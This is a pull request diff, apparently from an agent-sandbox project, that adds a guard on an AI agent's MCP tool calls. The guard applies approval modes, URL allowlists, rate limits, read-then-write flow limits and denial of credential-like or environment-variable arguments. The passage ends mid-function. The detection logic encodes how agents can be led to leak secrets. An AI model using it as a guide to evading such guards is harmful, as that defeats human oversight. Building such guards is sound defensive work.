### PR TITLE
[codex] Guard MCP tool-call ambient authority

### DIFF
--- a/Cargo.lock
+++ b/Cargo.lock
@@ -61,6 +61,7 @@ dependencies = [
  "agentenv-core",
  "agentenv-credstore",
  "agentenv-events",
+ "agentenv-mcp",
  "agentenv-plugin",
  "agentenv-policy",
  "agentenv-proto",
@@ -101,6 +102,7 @@ dependencies = [
  "tracing-subscriber",
  "tui",
  "url",
+ "uuid",
 ]
 
 [[package]]
@@ -209,6 +211,10 @@ version = "0.0.1-alpha0"
 dependencies = [
  "agentenv-core",
  "agentenv-proto",
+ "serde",
+ "serde_json",
+ "serde_yaml",
+ "thiserror 1.0.69",
  "url",
 ]
 
@@ -248,6 +254,7 @@ dependencies = [
  "schemars",
  "serde",
  "serde_json",
+ "serde_yaml",
  "thiserror 1.0.69",
 ]
 

--- a/blueprints/claude+filesystem+openshell.yaml
+++ b/blueprints/claude+filesystem+openshell.yaml
@@ -38,6 +38,18 @@ policy:
   presets:
     - github_read
     - npm_read
+  # mcp:
+  #   confused_deputy_guards:
+  #     enabled: true
+  #     default_approval: per-call
+  #     tool_policies:
+  #       "filesystem.read":
+  #         approval: never
+  #         rate_limit: 50/session
+  #       "*.write":
+  #         approval: per-session
+  #     cross_tool_flows:
+  #       forbid_read_to_write_turns: 5
 
 state:
   persist_home: true           # keep ~/.claude in a per-env persistent volume

--- a/blueprints/claude+mcp-generic+openshell.yaml
+++ b/blueprints/claude+mcp-generic+openshell.yaml
@@ -42,6 +42,18 @@ policy:
   presets: []
   overrides:
     - allow: "${MCP_URL}"
+  # mcp:
+  #   confused_deputy_guards:
+  #     enabled: true
+  #     default_approval: per-call
+  #     tool_policies:
+  #       "web.fetch":
+  #         approval: per-call
+  #         url_allowlist:
+  #           - api.github.com
+  #         redact_args: true
+  #     cross_tool_flows:
+  #       forbid_read_to_write_turns: 5
 
 state:
   persist_home: true

--- a/blueprints/codex+filesystem+openshell.yaml
+++ b/blueprints/codex+filesystem+openshell.yaml
@@ -34,6 +34,18 @@ policy:
   presets:
     - github_read
     - npm_read
+  # mcp:
+  #   confused_deputy_guards:
+  #     enabled: true
+  #     default_approval: per-call
+  #     tool_policies:
+  #       "filesystem.read":
+  #         approval: never
+  #         rate_limit: 50/session
+  #       "*.write":
+  #         approval: per-session
+  #     cross_tool_flows:
+  #       forbid_read_to_write_turns: 5
 
 state:
   persist_home: true

--- a/blueprints/codex+mcp-generic+openshell.yaml
+++ b/blueprints/codex+mcp-generic+openshell.yaml
@@ -42,3 +42,15 @@ policy:
   presets: []
   overrides:
     - allow: "${MCP_URL}"
+  # mcp:
+  #   confused_deputy_guards:
+  #     enabled: true
+  #     default_approval: per-call
+  #     tool_policies:
+  #       "web.fetch":
+  #         approval: per-call
+  #         url_allowlist:
+  #           - api.github.com
+  #         redact_args: true
+  #     cross_tool_flows:
+  #       forbid_read_to_write_turns: 5

--- a/crates/agentenv-core/src/egress_proxy.rs
+++ b/crates/agentenv-core/src/egress_proxy.rs
@@ -62,6 +62,8 @@ pub struct BrokerRoute {
     pub credential_name: String,
     pub request_path_prefix: String,
     pub allowed_hosts: BTreeSet<String>,
+    #[serde(default, skip_serializing_if = "Option::is_none")]
+    pub mcp_guard: Option<agentenv_proto::McpGuardConfig>,
 }
 
 #[derive(Debug, Clone, Default, PartialEq, Eq, Serialize, Deserialize)]
@@ -79,6 +81,7 @@ pub struct McpProxySource {
     pub route_id: String,
     pub upstream_url: Url,
     pub token_credential_name: Option<String>,
+    pub guard_config: Option<agentenv_proto::McpGuardConfig>,
 }
 
 #[derive(Debug, Clone)]
@@ -511,6 +514,7 @@ pub fn build_egress_proxy_plan(
             credential_name,
             request_path_prefix,
             allowed_hosts: allowed_hosts_for_url(&source.upstream_url),
+            mcp_guard: source.guard_config,
         });
         Some(rewritten_url)
     } else {
@@ -545,6 +549,7 @@ pub fn build_egress_proxy_plan(
             credential_name,
             request_path_prefix,
             allowed_hosts: allowed_hosts_for_url(&registry.upstream_base_url),
+            mcp_guard: None,
         });
     }
 
@@ -680,6 +685,7 @@ fn provider_route(
         upstream_base_url,
         credential_name: credential_name.to_owned(),
         request_path_prefix: request_path_prefix.to_owned(),
+        mcp_guard: None,
     })
 }
 
@@ -1261,6 +1267,7 @@ mod tests {
             route_id: "primary".to_owned(),
             upstream_url: "https://mcp.example.test/rpc".parse().unwrap(),
             token_credential_name: Some("MCP_TOKEN".to_owned()),
+            guard_config: None,
         };
 
         let plan = build_egress_proxy_plan(EgressProxyPlanInput {
@@ -1288,6 +1295,39 @@ mod tests {
             .find(|route| route.id == "mcp.primary")
             .expect("MCP route should be present");
         assert!(route.allowed_hosts.contains("mcp.example.test"));
+    }
+
+    #[test]
+    fn mcp_route_carries_guard_config_when_supplied() {
+        let endpoint = McpProxySource {
+            route_id: "primary".to_owned(),
+            upstream_url: "https://mcp.example.test/rpc".parse().unwrap(),
+            token_credential_name: Some("MCP_TOKEN".to_owned()),
+            guard_config: Some(agentenv_proto::McpGuardConfig {
+                enabled: true,
+                default_approval: agentenv_proto::McpApprovalMode::PerCall,
+                tool_policies: BTreeMap::new(),
+                cross_tool_flows: agentenv_proto::McpCrossToolFlowPolicy::default(),
+            }),
+        };
+
+        let plan = build_egress_proxy_plan(EgressProxyPlanInput {
+            env_name: "demo".to_owned(),
+            proxy_base_url: "http://127.0.0.1:31002".parse().unwrap(),
+            credential_requirements: vec![required("MCP_TOKEN")],
+            network_policy: policy(),
+            context_mcp: Some(endpoint),
+            inference_endpoint: None,
+            explicit_routes: ExplicitEgressRoutes::default(),
+        })
+        .expect("plan builds");
+
+        let route = plan
+            .routes
+            .iter()
+            .find(|route| route.id == "mcp.primary")
+            .expect("MCP route should be present");
+        assert!(route.mcp_guard.as_ref().is_some_and(|guard| guard.enabled));
     }
 
     #[test]
@@ -1629,6 +1669,7 @@ mod tests {
                     route_id: route_id.to_owned(),
                     upstream_url: "https://mcp.example.test/rpc".parse().unwrap(),
                     token_credential_name: Some("MCP_TOKEN".to_owned()),
+                    guard_config: None,
                 }),
                 inference_endpoint: None,
                 explicit_routes: ExplicitEgressRoutes::default(),

--- a/crates/agentenv-core/src/lifecycle.rs
+++ b/crates/agentenv-core/src/lifecycle.rs
@@ -171,6 +171,11 @@ pub enum LifecycleError {
         #[source]
         source: DnsPolicyError,
     },
+    #[error("invalid MCP guard policy at `policy.mcp.confused_deputy_guards`: {source}")]
+    McpGuardPolicy {
+        #[source]
+        source: serde_yaml::Error,
+    },
     #[error(transparent)]
     Hardening(#[from] crate::hardening::HardeningError),
     #[error("failed to serialize canonical resolved blueprint: {0}")]
@@ -286,6 +291,7 @@ fn validate_blueprint_urls(blueprint: &Blueprint) -> Result<(), LifecycleError> 
     }
     validate_policy_url_overrides(&blueprint.policy, &options)?;
     validate_blueprint_dns_policy(&blueprint.policy)?;
+    validate_mcp_guard_policy_extra(&blueprint.policy)?;
 
     Ok(())
 }
@@ -303,6 +309,25 @@ fn validate_blueprint_dns_policy(policy: &PolicySection) -> Result<(), Lifecycle
         pin_resolved_ips: dns.pin_resolved_ips,
     })
     .map_err(|source| LifecycleError::DnsPolicy { source })
+}
+
+fn validate_mcp_guard_policy_extra(policy: &PolicySection) -> Result<(), LifecycleError> {
+    let Some(mcp) = policy.extra.get("mcp") else {
+        return Ok(());
+    };
+    let mcp = mcp
+        .as_mapping()
+        .ok_or_else(|| LifecycleError::InvalidFieldType {
+            path: "policy.mcp".to_owned(),
+            expected: "mapping",
+        })?;
+    let Some(config) = mapping_value(mcp, "confused_deputy_guards") else {
+        return Ok(());
+    };
+
+    serde_yaml::from_value::<agentenv_proto::McpGuardConfig>(config.clone())
+        .map(|_| ())
+        .map_err(|source| LifecycleError::McpGuardPolicy { source })
 }
 
 fn validate_context_blueprint_urls(

--- a/crates/agentenv-core/src/runtime.rs
+++ b/crates/agentenv-core/src/runtime.rs
@@ -538,6 +538,8 @@ impl<'a> CreateEnvRollback<'a> {
 
 static CREATE_WORKSPACE_SEQ: AtomicU64 = AtomicU64::new(0);
 const AGENT_ENTRYPOINT_PATH: &str = "/sandbox/.agentenv/bin/agentenv-agent";
+const MCP_GUARD_CONFIG_SANDBOX_PATH: &str = "/sandbox/.agentenv/mcp-guard/context.json";
+const MCP_GUARD_EVENTS_DB_SANDBOX_PATH: &str = "/sandbox/.agentenv/mcp-guard/events.db";
 const BUILD_ONEFLIGHT_KIND: &str = "byo-openshell-v1";
 const BUILD_ONEFLIGHT_SEED_VERSION: &str = "1";
 
@@ -557,7 +559,14 @@ struct AgentSandboxSetup {
     mcp_config_host_path: PathBuf,
     mcp_config_sandbox_path: String,
     entrypoint_host_path: PathBuf,
+    extra_files: Vec<AgentSandboxFile>,
     health_probe: agentenv_proto::AgentHealthCheckProbe,
+}
+
+struct AgentSandboxFile {
+    host_path: PathBuf,
+    sandbox_path: String,
+    mode: &'static str,
 }
 
 struct AgentInstallCommand {
@@ -1224,6 +1233,8 @@ async fn create_env_with_input(
             policy.network.allow.extend(context_network_rules.rules);
         }
 
+        let mcp_guard_config =
+            mcp_guard_config_from_policy_extra(&resolved.blueprint.policy.extra)?;
         let egress_proxy_plan = build_runtime_egress_proxy_plan(RuntimeEgressProxyPlanInput {
             env_name: name,
             requirements: &requirements,
@@ -1231,11 +1242,18 @@ async fn create_env_with_input(
             context_endpoint: &context_endpoint,
             inference_endpoint: inference_endpoint.as_deref(),
             policy_extra: &resolved.blueprint.policy.extra,
+            mcp_guard_config: mcp_guard_config.as_ref(),
             sandbox_capabilities: &sandbox_init.capabilities,
             sandbox_driver: &selection.sandbox,
         })?;
         let context_endpoint_for_sandbox =
             rewrite_context_endpoint_for_proxy(&context_endpoint, &egress_proxy_plan);
+        let (guarded_context_endpoint, mcp_guard_files) = rewrite_context_endpoint_for_mcp_guard(
+            name,
+            &context_endpoint_for_sandbox,
+            mcp_guard_config.as_ref(),
+            &temp_workspace,
+        )?;
         let mut env = sandbox_env_for_credential_plan(
             credentials,
             &requirements,
@@ -1250,7 +1268,8 @@ async fn create_env_with_input(
             &temp_workspace,
             set.agent.as_ref(),
             agent_spec.clone(),
-            vec![context_endpoint_for_sandbox.clone()],
+            vec![guarded_context_endpoint.clone()],
+            mcp_guard_files,
         )
         .await?;
 
@@ -1271,7 +1290,7 @@ async fn create_env_with_input(
             &lock_yaml,
             &selection,
             &resolved,
-            &context_endpoint_for_sandbox,
+            &guarded_context_endpoint,
             &resolved.blueprint.sandbox.extra,
         )?;
 
@@ -1279,7 +1298,7 @@ async fn create_env_with_input(
             name,
             &selection,
             &resolved.blueprint.sandbox.extra,
-            &context_endpoint_for_sandbox,
+            &guarded_context_endpoint,
             SandboxSpecCreateOptions {
                 env,
                 policy: Some(create_policy.clone()),
@@ -1475,7 +1494,7 @@ async fn create_env_with_input(
             },
             endpoints: crate::env::EndpointState {
                 context_mcp: Some(crate::env::PersistedMcpEndpoint::from_mcp(
-                    context_endpoint_for_sandbox,
+                    guarded_context_endpoint,
                 )),
                 inference: inference_endpoint,
             },
@@ -2602,6 +2621,7 @@ struct RuntimeEgressProxyPlanInput<'a> {
     context_endpoint: &'a agentenv_proto::McpEndpoint,
     inference_endpoint: Option<&'a str>,
     policy_extra: &'a BTreeMap<String, serde_yaml::Value>,
+    mcp_guard_config: Option<&'a agentenv_proto::McpGuardConfig>,
     sandbox_capabilities: &'a Capabilities,
     sandbox_driver: &'a str,
 }
@@ -2630,7 +2650,10 @@ fn build_runtime_egress_proxy_plan(
         proxy_base_url: urls.sandbox_base_url,
         credential_requirements: input.requirements.to_vec(),
         network_policy: input.policy.clone(),
-        context_mcp: mcp_proxy_source_for_context_endpoint(input.context_endpoint),
+        context_mcp: mcp_proxy_source_for_context_endpoint(
+            input.context_endpoint,
+            input.mcp_guard_config,
+        ),
         inference_endpoint: parse_inference_endpoint_url(input.inference_endpoint)?,
         explicit_routes,
     })?;
@@ -2755,6 +2778,30 @@ fn explicit_egress_routes_from_policy_extra(
     })
 }
 
+fn mcp_guard_config_from_policy_extra(
+    policy_extra: &BTreeMap<String, serde_yaml::Value>,
+) -> RuntimeResult<Option<agentenv_proto::McpGuardConfig>> {
+    let Some(mcp) = policy_extra.get("mcp") else {
+        return Ok(None);
+    };
+    let mcp = mcp.as_mapping().ok_or_else(|| {
+        RuntimeError::Driver(DriverError::InvalidInput {
+            message: "policy.mcp must be a mapping".to_owned(),
+        })
+    })?;
+    let Some(guards) = yaml_mapping_value(mcp, "confused_deputy_guards") else {
+        return Ok(None);
+    };
+    let config = serde_yaml::from_value::<agentenv_proto::McpGuardConfig>(guards.clone()).map_err(
+        |source| {
+            RuntimeError::Driver(DriverError::InvalidInput {
+                message: format!("invalid policy.mcp.confused_deputy_guards: {source}"),
+            })
+        },
+    )?;
+    Ok(config.enabled.then_some(config))
+}
+
 fn egress_proxy_required_by_policy_extra(
     policy_extra: &BTreeMap<String, serde_yaml::Value>,
 ) -> bool {
@@ -2786,7 +2833,7 @@ fn required_egress_proxy_service_label(
     {
         return "anthropic".to_owned();
     }
-    if mcp_proxy_source_for_context_endpoint(context_endpoint).is_some() {
+    if mcp_proxy_source_for_context_endpoint(context_endpoint, None).is_some() {
         return "mcp".to_owned();
     }
     "egress_proxy".to_owned()
@@ -2794,6 +2841,7 @@ fn required_egress_proxy_service_label(
 
 fn mcp_proxy_source_for_context_endpoint(
     endpoint: &agentenv_proto::McpEndpoint,
+    guard_config: Option<&agentenv_proto::McpGuardConfig>,
 ) -> Option<McpProxySource> {
     if !matches!(
         endpoint.transport,
@@ -2811,6 +2859,7 @@ fn mcp_proxy_source_for_context_endpoint(
         route_id: "context".to_owned(),
         upstream_url,
         token_credential_name: Some("MCP_TOKEN".to_owned()),
+        guard_config: guard_config.cloned(),
     })
 }
 
@@ -2826,6 +2875,59 @@ fn rewrite_context_endpoint_for_proxy(
     rewritten.url = url.as_str().to_owned();
     rewritten.headers.clear();
     rewritten
+}
+
+fn rewrite_context_endpoint_for_mcp_guard(
+    env_name: &str,
+    endpoint: &agentenv_proto::McpEndpoint,
+    guard_config: Option<&agentenv_proto::McpGuardConfig>,
+    temp_workspace: &Path,
+) -> RuntimeResult<(agentenv_proto::McpEndpoint, Vec<AgentSandboxFile>)> {
+    let Some(guard_config) = guard_config else {
+        return Ok((endpoint.clone(), Vec::new()));
+    };
+    if endpoint.transport != agentenv_proto::McpTransport::Stdio {
+        return Ok((endpoint.clone(), Vec::new()));
+    }
+
+    let file = write_mcp_guard_config_file(temp_workspace, guard_config)?;
+    let mut rewritten = endpoint.clone();
+    rewritten.url = format!(
+        "agentenv mcp-guard run --env {} --config {} --events-db {} --stdio-upstream {}",
+        shell_quote(env_name),
+        shell_quote(MCP_GUARD_CONFIG_SANDBOX_PATH),
+        shell_quote(MCP_GUARD_EVENTS_DB_SANDBOX_PATH),
+        shell_quote(&endpoint.url),
+    );
+    rewritten.headers.clear();
+    Ok((rewritten, vec![file]))
+}
+
+fn write_mcp_guard_config_file(
+    temp_workspace: &Path,
+    guard_config: &agentenv_proto::McpGuardConfig,
+) -> RuntimeResult<AgentSandboxFile> {
+    let agent_dir = temp_workspace.join("agent-assets");
+    fs::create_dir_all(&agent_dir).map_err(|source| crate::env::EnvError::Io {
+        path: agent_dir.clone(),
+        source,
+    })?;
+    let host_path = agent_dir.join("mcp-guard-context.json");
+    let content = serde_json::to_vec_pretty(guard_config).map_err(|source| {
+        RuntimeError::Driver(DriverError::InvalidInput {
+            message: format!("serialize MCP guard config: {source}"),
+        })
+    })?;
+    fs::write(&host_path, content).map_err(|source| crate::env::EnvError::Io {
+        path: host_path.clone(),
+        source,
+    })?;
+
+    Ok(AgentSandboxFile {
+        host_path,
+        sandbox_path: MCP_GUARD_CONFIG_SANDBOX_PATH.to_owned(),
+        mode: "0600",
+    })
 }
 
 fn sandbox_env_for_credential_plan(
@@ -4747,6 +4849,7 @@ async fn prepare_agent_sandbox_setup(
     agent: &dyn AgentDriver,
     spec: AgentSpec,
     endpoints: Vec<agentenv_proto::McpEndpoint>,
+    extra_files: Vec<AgentSandboxFile>,
 ) -> RuntimeResult<AgentSandboxSetup> {
     let can_skip_install_if_probe_passes = spec.version.is_none();
     let install_steps = agent.install_steps(spec.clone()).await?;
@@ -4786,6 +4889,7 @@ async fn prepare_agent_sandbox_setup(
         mcp_config_host_path,
         mcp_config_sandbox_path: normalize_agent_sandbox_path(&mcp_config_path.path)?,
         entrypoint_host_path,
+        extra_files,
         health_probe,
     })
 }
@@ -4828,6 +4932,16 @@ async fn install_agent_in_sandbox(
         "0755",
     )
     .await?;
+    for file in &setup.extra_files {
+        copy_agent_file_into_sandbox(
+            sandbox,
+            handle,
+            &file.host_path,
+            &file.sandbox_path,
+            file.mode,
+        )
+        .await?;
+    }
 
     let result = sandbox
         .exec(agentenv_proto::ExecParams {
@@ -6066,13 +6180,9 @@ policy:
 
     #[cfg(unix)]
     fn failing_fake_egress_proxy_bin(root: &std::path::Path) -> EnvVarGuard {
-        use std::os::unix::fs::PermissionsExt;
-
         fs::create_dir_all(root).expect("create fake proxy root");
         let fake_proxy = root.join("failing-agentenv-proxy.sh");
         fs::write(&fake_proxy, "#!/bin/sh\nexit 2\n").expect("write fake proxy");
-        fs::set_permissions(&fake_proxy, fs::Permissions::from_mode(0o755))
-            .expect("fake proxy executable");
         EnvVarGuard::set(crate::egress_proxy::EGRESS_PROXY_BIN_ENV, &fake_proxy)
     }
 
@@ -9382,6 +9492,54 @@ policy:
         if let Some(pid) = proxy.pid {
             let _ = crate::egress_proxy::stop_egress_proxy_pid(pid).await;
         }
+    }
+
+    #[tokio::test]
+    async fn create_env_rewrites_stdio_mcp_endpoint_when_guard_enabled() {
+        let root = unique_root("agentenv-mcp-guard-stdio");
+        let options = RuntimeOptions {
+            root,
+            log_level: LogLevel::Info,
+            non_interactive: true,
+        };
+        let yaml = r#"
+version: 0.1.0
+min_agentenv_version: 0.0.1-alpha0
+sandbox:
+  driver: openshell
+agent:
+  driver: codex
+context:
+  driver: filesystem
+  mount: .
+policy:
+  tier: restricted
+  mcp:
+    confused_deputy_guards:
+      enabled: true
+      default_approval: per-call
+"#;
+        let tracker = Arc::new(AgentSetupTracker::default());
+        let factory = AgentSetupFactory {
+            tracker: Arc::clone(&tracker),
+        };
+        let mut credentials = super::tests_support::EmptyCredentialProvider;
+
+        super::create_env(&options, &factory, &mut credentials, "demo", yaml)
+            .await
+            .expect("env create should succeed");
+
+        let endpoint_batches = tracker
+            .mcp_config_endpoints
+            .lock()
+            .expect("mcp config endpoint tracker");
+        assert!(endpoint_batches[0][0]
+            .url
+            .contains("agentenv mcp-guard run"));
+        assert_eq!(
+            endpoint_batches[0][0].transport,
+            agentenv_proto::McpTransport::Stdio
+        );
     }
 
     #[cfg(unix)]

--- a/crates/agentenv-core/tests/roundtrip.rs
+++ b/crates/agentenv-core/tests/roundtrip.rs
@@ -217,6 +217,61 @@ fn roundtrip_missing_digest_blueprint_is_rejected() {
 }
 
 #[test]
+fn verify_blueprint_accepts_mcp_guard_policy_extra() {
+    let yaml = r#"
+version: 0.1.0
+min_agentenv_version: 0.0.1-alpha0
+sandbox:
+  driver: openshell
+agent:
+  driver: codex
+context:
+  driver: none
+policy:
+  tier: restricted
+  mcp:
+    confused_deputy_guards:
+      enabled: true
+      default_approval: per-call
+      tool_policies:
+        "*.write":
+          approval: per-session
+"#;
+
+    let resolved = agentenv_core::lifecycle::verify_blueprint_yaml(yaml)
+        .expect("MCP guard config should verify");
+
+    assert_eq!(resolved.blueprint.policy.tier, "restricted");
+}
+
+#[test]
+fn verify_blueprint_rejects_invalid_mcp_guard_policy_extra() {
+    let yaml = r#"
+version: 0.1.0
+min_agentenv_version: 0.0.1-alpha0
+sandbox:
+  driver: openshell
+agent:
+  driver: codex
+context:
+  driver: none
+policy:
+  tier: restricted
+  mcp:
+    confused_deputy_guards:
+      enabled: true
+      default_approval: always
+"#;
+
+    let err = agentenv_core::lifecycle::verify_blueprint_yaml(yaml)
+        .expect_err("invalid MCP guard config should fail");
+
+    assert!(err
+        .to_string()
+        .contains("policy.mcp.confused_deputy_guards"));
+}
+
+#[test]
 fn roundtrip_byo_sandbox_image_allows_omitted_expected_digest() {
     let yaml = r#"
 version: 0.1.0

--- a/crates/agentenv-mcp/Cargo.toml
+++ b/crates/agentenv-mcp/Cargo.toml
@@ -13,4 +13,8 @@ description = "MCP integration scaffolding for agentenv"
 [dependencies]
 agentenv-core = { path = "../agentenv-core" }
 agentenv-proto = { path = "../agentenv-proto" }
+serde.workspace = true
+serde_json.workspace = true
+serde_yaml.workspace = true
+thiserror.workspace = true
 url.workspace = true

--- a/crates/agentenv-mcp/src/guard.rs
+++ b/crates/agentenv-mcp/src/guard.rs
@@ -1,0 +1,675 @@
+use std::collections::{BTreeMap, VecDeque};
+
+use agentenv_proto::{McpApprovalMode, McpGuardConfig, McpSessionRateLimit};
+use serde_json::{json, Value};
+use thiserror::Error;
+use url::Url;
+
+#[derive(Debug, Clone, PartialEq, Eq)]
+pub struct MatchedToolPolicy {
+    pub pattern: Option<String>,
+    pub approval: McpApprovalMode,
+    pub rate_limit: Option<McpSessionRateLimit>,
+    pub url_allowlist: Vec<String>,
+    pub redact_args: bool,
+}
+
+#[derive(Debug, Default)]
+pub struct GuardSessionState {
+    calls_by_pattern: BTreeMap<String, u32>,
+    recent_reads: VecDeque<RecentRead>,
+    session_grants: BTreeMap<String, bool>,
+    tool_calls_seen: u64,
+}
+
+impl GuardSessionState {
+    pub fn grant_session(&mut self, tool_name: impl Into<String>) {
+        self.session_grants.insert(tool_name.into(), true);
+    }
+
+    fn has_session_grant(&self, tool_name: &str, matched_policy: Option<&str>) -> bool {
+        self.session_grants.get(tool_name).copied().unwrap_or(false)
+            || matched_policy
+                .and_then(|pattern| self.session_grants.get(pattern))
+                .copied()
+                .unwrap_or(false)
+    }
+}
+
+#[derive(Debug)]
+struct RecentRead {
+    turn: u64,
+}
+
+#[derive(Debug, Clone, PartialEq)]
+pub struct GuardDecision {
+    pub action: GuardAction,
+    pub reason: GuardReason,
+    pub tool_name: Option<String>,
+    pub matched_policy: Option<String>,
+    pub approval_mode: McpApprovalMode,
+    pub redacted_event_context: Value,
+}
+
+#[derive(Debug, Clone, Copy, PartialEq, Eq)]
+pub enum GuardAction {
+    Forward,
+    Deny,
+    RequestApproval,
+    NotToolCall,
+}
+
+#[derive(Debug, Clone, Copy, PartialEq, Eq)]
+pub enum GuardReason {
+    Disabled,
+    NotToolCall,
+    AllowedByPolicy,
+    ApprovalRequired,
+    UrlAllowlistViolation,
+    CredentialLikeArgument,
+    EnvVarLikeArgument,
+    RateLimited,
+    CrossToolFlow,
+    MalformedToolCall,
+}
+
+#[derive(Debug, Error)]
+pub enum GuardError {
+    #[error("malformed MCP tool call: {0}")]
+    MalformedToolCall(String),
+}
+
+pub fn match_policy(config: &McpGuardConfig, tool_name: &str) -> MatchedToolPolicy {
+    if let Some(policy) = config.tool_policies.get(tool_name) {
+        return MatchedToolPolicy {
+            pattern: Some(tool_name.to_owned()),
+            approval: policy
+                .approval
+                .clone()
+                .unwrap_or_else(|| config.default_approval.clone()),
+            rate_limit: policy.rate_limit,
+            url_allowlist: policy.url_allowlist.clone(),
+            redact_args: policy.redact_args,
+        };
+    }
+
+    let wildcard = config
+        .tool_policies
+        .iter()
+        .filter(|(pattern, _)| pattern.contains('*') && wildcard_matches(pattern, tool_name))
+        .max_by(|(left, _), (right, _)| {
+            wildcard_specificity(left).cmp(&wildcard_specificity(right))
+        });
+
+    if let Some((pattern, policy)) = wildcard {
+        return MatchedToolPolicy {
+            pattern: Some(pattern.clone()),
+            approval: policy
+                .approval
+                .clone()
+                .unwrap_or_else(|| config.default_approval.clone()),
+            rate_limit: policy.rate_limit,
+            url_allowlist: policy.url_allowlist.clone(),
+            redact_args: policy.redact_args,
+        };
+    }
+
+    MatchedToolPolicy {
+        pattern: None,
+        approval: config.default_approval.clone(),
+        rate_limit: None,
+        url_allowlist: Vec::new(),
+        redact_args: false,
+    }
+}
+
+pub fn evaluate_json_rpc_request(
+    config: &McpGuardConfig,
+    state: &mut GuardSessionState,
+    request: &Value,
+) -> Result<GuardDecision, GuardError> {
+    let Some(method) = request.get("method").and_then(Value::as_str) else {
+        return Ok(not_tool_call_decision(
+            config.default_approval.clone(),
+            None,
+        ));
+    };
+
+    if method != "tools/call" {
+        return Ok(not_tool_call_decision(
+            config.default_approval.clone(),
+            Some(method),
+        ));
+    }
+
+    if !config.enabled {
+        return Ok(GuardDecision {
+            action: GuardAction::Forward,
+            reason: GuardReason::Disabled,
+            tool_name: tool_name_from_request(request).ok(),
+            matched_policy: None,
+            approval_mode: config.default_approval.clone(),
+            redacted_event_context: json!({"method": method, "guard": "disabled"}),
+        });
+    }
+
+    let params = request
+        .get("params")
+        .and_then(Value::as_object)
+        .ok_or_else(|| GuardError::MalformedToolCall("missing params object".to_owned()))?;
+    let tool_name = params
+        .get("name")
+        .and_then(Value::as_str)
+        .ok_or_else(|| GuardError::MalformedToolCall("missing params.name".to_owned()))?;
+    let arguments = params.get("arguments").unwrap_or(&Value::Null);
+    let matched = match_policy(config, tool_name);
+    let event_context = event_context(tool_name, arguments, &matched);
+
+    if !matched.url_allowlist.is_empty()
+        && has_url_allowlist_violation(arguments, &matched.url_allowlist)
+    {
+        return Ok(decision(
+            GuardAction::Deny,
+            GuardReason::UrlAllowlistViolation,
+            tool_name,
+            &matched,
+            event_context,
+        ));
+    }
+
+    if contains_credential_like_argument(arguments) {
+        return Ok(decision(
+            GuardAction::Deny,
+            GuardReason::CredentialLikeArgument,
+            tool_name,
+            &matched,
+            event_context,
+        ));
+    }
+
+    if contains_env_var_like_argument(arguments) {
+        return Ok(decision(
+            GuardAction::Deny,
+            GuardReason::EnvVarLikeArgument,
+            tool_name,
+            &matched,
+            event_context,
+        ));
+    }
+
+    if exceeds_rate_limit(state, tool_name, &matched) {
+        return Ok(decision(
+            GuardAction::Deny,
+            GuardReason::RateLimited,
+            tool_name,
+            &matched,
+            event_context,
+        ));
+    }
+
+    if violates_cross_tool_flow(config, state, tool_name) {
+        return Ok(decision(
+            GuardAction::RequestApproval,
+            GuardReason::CrossToolFlow,
+            tool_name,
+            &matched,
+            event_context,
+        ));
+    }
+
+    let (action, reason) = match matched.approval {
+        McpApprovalMode::Never => (GuardAction::Forward, GuardReason::AllowedByPolicy),
+        McpApprovalMode::PerCall => (GuardAction::RequestApproval, GuardReason::ApprovalRequired),
+        McpApprovalMode::PerSession
+            if state.has_session_grant(tool_name, matched.pattern.as_deref()) =>
+        {
+            (GuardAction::Forward, GuardReason::AllowedByPolicy)
+        }
+        McpApprovalMode::PerSession => {
+            (GuardAction::RequestApproval, GuardReason::ApprovalRequired)
+        }
+    };
+
+    Ok(decision(action, reason, tool_name, &matched, event_context))
+}
+
+fn not_tool_call_decision(approval_mode: McpApprovalMode, method: Option<&str>) -> GuardDecision {
+    GuardDecision {
+        action: GuardAction::NotToolCall,
+        reason: GuardReason::NotToolCall,
+        tool_name: None,
+        matched_policy: None,
+        approval_mode,
+        redacted_event_context: json!({"method": method}),
+    }
+}
+
+fn decision(
+    action: GuardAction,
+    reason: GuardReason,
+    tool_name: &str,
+    matched: &MatchedToolPolicy,
+    redacted_event_context: Value,
+) -> GuardDecision {
+    GuardDecision {
+        action,
+        reason,
+        tool_name: Some(tool_name.to_owned()),
+        matched_policy: matched.pattern.clone(),
+        approval_mode: matched.approval.clone(),
+        redacted_event_context,
+    }
+}
+
+fn event_context(tool_name: &str, arguments: &Value, matched: &MatchedToolPolicy) -> Value {
+    json!({
+        "tool_name": tool_name,
+        "matched_policy": matched.pattern,
+        "approval": matched.approval,
+        "arguments": redact_arguments(arguments, matched.redact_args),
+    })
+}
+
+fn tool_name_from_request(request: &Value) -> Result<String, GuardError> {
+    request
+        .get("params")
+        .and_then(Value::as_object)
+        .and_then(|params| params.get("name"))
+        .and_then(Value::as_str)
+        .map(str::to_owned)
+        .ok_or_else(|| GuardError::MalformedToolCall("missing params.name".to_owned()))
+}
+
+fn wildcard_matches(pattern: &str, tool_name: &str) -> bool {
+    let Some((prefix, suffix)) = pattern.split_once('*') else {
+        return false;
+    };
+    tool_name.starts_with(prefix) && tool_name.ends_with(suffix)
+}
+
+fn wildcard_specificity(pattern: &str) -> usize {
+    pattern.chars().filter(|ch| *ch != '*').count()
+}
+
+fn has_url_allowlist_violation(value: &Value, allowlist: &[String]) -> bool {
+    urls_in_value(value)
+        .into_iter()
+        .any(|url| !url_host_allowed(&url, allowlist))
+}
+
+fn urls_in_value(value: &Value) -> Vec<Url> {
+    let mut urls = Vec::new();
+    collect_urls(value, &mut urls);
+    urls
+}
+
+fn collect_urls(value: &Value, urls: &mut Vec<Url>) {
+    match value {
+        Value::String(text) => {
+            if let Ok(url) = Url::parse(text) {
+                if matches!(url.scheme(), "http" | "https") {
+                    urls.push(url);
+                }
+            }
+        }
+        Value::Array(items) => {
+            for item in items {
+                collect_urls(item, urls);
+            }
+        }
+        Value::Object(map) => {
+            for item in map.values() {
+                collect_urls(item, urls);
+            }
+        }
+        Value::Null | Value::Bool(_) | Value::Number(_) => {}
+    }
+}
+
+fn url_host_allowed(url: &Url, allowlist: &[String]) -> bool {
+    let Some(host) = url.host_str() else {
+        return false;
+    };
+    allowlist
+        .iter()
+        .any(|allowed| host == allowed || host.ends_with(&format!(".{allowed}")))
+}
+
+fn contains_credential_like_argument(value: &Value) -> bool {
+    match value {
+        Value::Object(map) => map
+            .iter()
+            .any(|(key, item)| is_sensitive_key(key) || contains_credential_like_argument(item)),
+        Value::Array(items) => items.iter().any(contains_credential_like_argument),
+        Value::String(text) => looks_like_secret_value(text),
